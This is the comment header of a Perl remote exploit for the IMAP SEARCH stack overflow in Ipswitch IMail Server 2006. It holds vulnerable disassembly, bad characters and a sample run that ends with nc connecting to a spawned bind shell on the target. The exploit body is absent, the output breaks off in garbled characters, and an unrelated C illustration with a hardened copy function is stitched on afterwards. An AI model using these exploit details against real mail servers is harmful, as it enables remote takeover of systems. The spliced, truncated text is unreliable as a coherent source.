IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit
#!/usr/bin/perl
#
# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
# Author: ZhenHan.Liu#ph4nt0m.org
# Date: 2007-07-25
# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
#
# Vuln Found by: Manuel Santamarina Suarez
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
#
# The vulnerable code is here (imap4d32.exe version 6.8.8.1)
# 00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
# 00418CD0 |. 0FBE11 |MOVSX EDX,BYTE PTR DS:[ECX]
# 00418CD3 |. 83FA 22 |CMP EDX,22
# 00418CD6 |. 75 2A |JNZ SHORT IMAP4D32.00418D02
# 00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
# 00418CDE |. 50 |PUSH EAX ; /String
# 00418CDF |. FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
# 00418CE5 |. 83E8 02 |SUB EAX,2
# 00418CE8 |. 50 |PUSH EAX ; /maxlen
# 00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; |
# 00418CEF |. 83C1 01 |ADD ECX,1 ; |
# 00418CF2 |. 51 |PUSH ECX ; |src
# 00418CF3 |. 8D55 AC |LEA EDX,DWORD PTR SS:[EBP-54] ; |
# 00418CF6 |. 52 |PUSH EDX ; |dest
# 00418CF7 |. FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>] ; \strncpy
# 00418CFD |. 83C4 0C |ADD ESP,0C
# 00418D00 |. EB 13 |JMP SHORT IMAP4D32.00418D15
# 00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
# 00418D08 |. 50 |PUSH EAX ; /src
# 00418D09 |. 8D4D AC |LEA ECX,DWORD PTR SS:[EBP-54] ; |
# 00418D0C |. 51 |PUSH ECX ; |dest
# 00418D0D |. E8 7E610100 |CALL <JMP.&MSVCR71.strcpy> ; \strcpy
# 00418D12 |. 83C4 08 |ADD ESP,8
#
# The programmer has made an extremely stupid mistake.
# He checks the argument's first byte: if it is 0x22 ("), he invokes strcpy,
# otherwise strncpy.
# The buffer overflow takes place when strcpy is called.
# But the strncpy is also vulnerable, because it amounts to strncpy(dest, src, strlen(src)):
# the length bound comes from the source, not from the destination buffer.
# So whether the argument starts with a '"' or not, the stack overflow takes place immediately.
#
# Multiple SEARCH command keywords are vulnerable; in this case we use "SEARCH ON",
# but others such as "SEARCH BEFORE" will also trigger the overflow.
#
# NOTE: To trigger the vulnerability, there must be at least one mail in the mailbox!!
#
# Bad chars: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
#
# Tested on Windows 2003 SP1 CN
#
# D:\>perl imap.pl 192.168.226.128 143
# * OK IMAP4 Server (IMail 9.10)
# 0 OK LOGIN completed
# * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
# * 1 EXISTS
# * 1 RECENT
# * OK [UIDVALIDITY 1185337300] UIDs valid
# * OK [UIDNEXT 485337302] Predicted next UID
# 2 OK [READ-WRITE] SELECT completed
# -------------- [BEGIN] -------------------
# ---------------- [END] ------------------
#
#
# D:\>nc -vv -n 192.168.226.128 1154
# (UNKNOWN) [192.168.226.128] 1154 (?) open
# Microsoft Windows [°
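The length-bounding bug described in the header, as an added illustration that is neither part of the exploit above nor the vendor's code: `original_copy_length` mirrors the two branches of the disassembly (a quoted argument goes through strncpy with a source-derived bound, an unquoted one through strcpy), `original_would_overflow` reports when that write would pass the 0x54 bytes between the buffer at EBP-54 and the saved frame pointer, and `copy_search_arg` is the destination-bounded form a fix should use. All function names and the `copies_to` helper are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Distance from the destination buffer (EBP-0x54) to the saved frame
 * pointer, read from the disassembly above. Every byte copied past this
 * point lands on saved EBP and then the return address. */
#define DEST_BYTES 0x54u

/* Bytes the original imap4d32 code writes for a SEARCH argument, mirroring
 * its two branches:
 *   arg[0] == '"'  ->  strncpy(dest, arg + 1, lstrlen(arg) - 2)
 *   otherwise      ->  strcpy(dest, arg)            (strlen + NUL)
 * Neither bound is derived from the destination size, which is the bug. */
size_t original_copy_length(const char *arg) {
    size_t len = strlen(arg);
    if (arg[0] == '"')
        return len - 2;  /* wraps to SIZE_MAX for a lone '"': strncpy pads NULs until it faults */
    return len + 1;
}

/* True when the original code would write past the destination buffer. */
bool original_would_overflow(const char *arg) {
    return original_copy_length(arg) > DEST_BYTES;
}

/* Hardened equivalent: bound the copy by the destination, not the source,
 * and always keep room for the terminator. Copies nothing and returns
 * false when the argument does not fit. */
bool copy_search_arg(char *dest, size_t dest_size, const char *arg) {
    size_t len = strlen(arg);
    const char *src = arg;
    if (len >= 2 && arg[0] == '"' && arg[len - 1] == '"') {
        src = arg + 1;   /* strip the surrounding quotes */
        len -= 2;
    }
    if (dest_size == 0 || len >= dest_size)
        return false;
    memcpy(dest, src, len);
    dest[len] = '\0';
    return true;
}

/* Hypothetical test helper: copy into a dest_size-byte window of a local
 * buffer and report whether the result equals expected. */
bool copies_to(const char *arg, size_t dest_size, const char *expected) {
    char buf[64];
    if (dest_size > sizeof buf) return false;
    return copy_search_arg(buf, dest_size, arg) && strcmp(buf, expected) == 0;
}
```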